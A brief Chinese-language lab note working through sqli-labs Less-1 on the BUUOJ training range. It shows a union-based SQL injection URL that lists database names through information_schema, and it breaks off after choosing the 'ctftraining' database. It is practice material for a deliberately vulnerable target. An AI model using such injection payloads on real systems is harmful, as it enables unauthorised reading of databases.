靶场:https://buuoj.cn/challenges 的sqli-labs
联合查询注入
L1:首先看有什么数据库
select group_concat(schema_name) from information_schema.schemata
完整url:
http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(schema_name) from information_schema.schemata
)'
选择“ctftraining”数据库
http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn